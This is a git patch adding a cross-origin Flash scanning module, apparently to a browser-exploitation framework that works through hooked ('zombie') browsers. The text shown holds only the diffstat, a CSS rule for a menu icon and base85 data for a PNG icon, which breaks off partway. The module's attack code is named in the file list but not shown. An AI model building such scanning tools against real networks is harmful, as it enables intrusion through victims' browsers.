From 848dc65c6f1aebeb62471e2bc4600ff56d0670fe Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Sun, 7 Feb 2016 11:20:55 +0000 Subject: [PATCH] Add cross_origin_scanner_flash module --- extensions/admin_ui/media/css/base.css | 6 + .../admin_ui/media/images/icons/flash.png | Bin 0 -> 27697 bytes .../ui/panel/tabs/ZombieTabNetwork.js | 158 +++++++++++++++- .../ContentHijacking.swf | Bin 0 -> 2881 bytes .../cross_origin_scanner_flash/command.js | 169 ++++++++++++++++++ .../cross_origin_scanner_flash/config.yaml | 16 ++ .../cross_origin_scanner_flash/module.rb | 46 +++++ 7 files changed, 394 insertions(+), 1 deletion(-) create mode 100644 extensions/admin_ui/media/images/icons/flash.png create mode 100644 modules/network/cross_origin_scanner_flash/ContentHijacking.swf create mode 100644 modules/network/cross_origin_scanner_flash/command.js create mode 100644 modules/network/cross_origin_scanner_flash/config.yaml create mode 100644 modules/network/cross_origin_scanner_flash/module.rb diff --git a/extensions/admin_ui/media/css/base.css b/extensions/admin_ui/media/css/base.css index 20899ce9a..ef4bda048 100644 --- a/extensions/admin_ui/media/css/base.css +++ b/extensions/admin_ui/media/css/base.css @@ -156,6 +156,12 @@ background-repeat: no-repeat; } +.network-host-ctxMenu-flash { + background-image: url(../images/icons/flash.png); + background-size: 16px 16px; + background-repeat: no-repeat; +} + .network-host-ctxMenu-shellshock { background-image: url(../images/icons/shellshock.png); background-size: 16px 16px; 
diff --git a/extensions/admin_ui/media/images/icons/flash.png b/extensions/admin_ui/media/images/icons/flash.png new file mode 100644 index 0000000000000000000000000000000000000000..1edbaa19983d3f7d85f7d91febd044723d2a0ce0 GIT binary patch literal 27697 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 